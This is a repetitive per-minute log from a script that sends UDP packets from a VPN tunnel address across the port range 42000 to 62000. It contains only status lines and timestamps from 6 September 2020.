10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:29:05 -Starting port fill at 2020-09-06 11:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:30:04 -Starting port fill at 2020-09-06 11:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:31:04 -Starting port fill at 2020-09-06 11:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:32:04 -Starting port fill at 2020-09-06 11:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:33:05 -Starting port fill at 2020-09-06 11:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:34:06 -Starting port fill at 2020-09-06 11:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:35:05 -Starting port fill at 2020-09-06 11:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:36:05 -Starting port fill at 2020-09-06 11:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:37:04 -Starting port fill at 2020-09-06 11:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:38:04 -Starting port fill at 2020-09-06 11:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:39:07 -Starting port fill at 2020-09-06 11:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:40:05 -Starting port fill at 2020-09-06 11:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:41:04 -Starting port fill at 2020-09-06 11:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:42:05 -Starting port fill at 2020-09-06 11:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:43:06 -Starting port fill at 2020-09-06 11:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:44:07 -Starting port fill at 2020-09-06 11:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:45:07 -Starting port fill at 2020-09-06 11:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:46:06 -Starting port fill at 2020-09-06 11:47:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 11:47:07 -Starting port fill at 2020-09-06 11:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:48:06 -Starting port fill at 2020-09-06 11:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:49:04 -Starting port fill at 2020-09-06 11:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:50:04 -Starting port fill at 2020-09-06 11:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:51:05 -Starting port fill at 2020-09-06 11:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:52:05 -Starting port fill at 2020-09-06 11:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 11:53:04 -Starting port fill at 2020-09-06 11:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 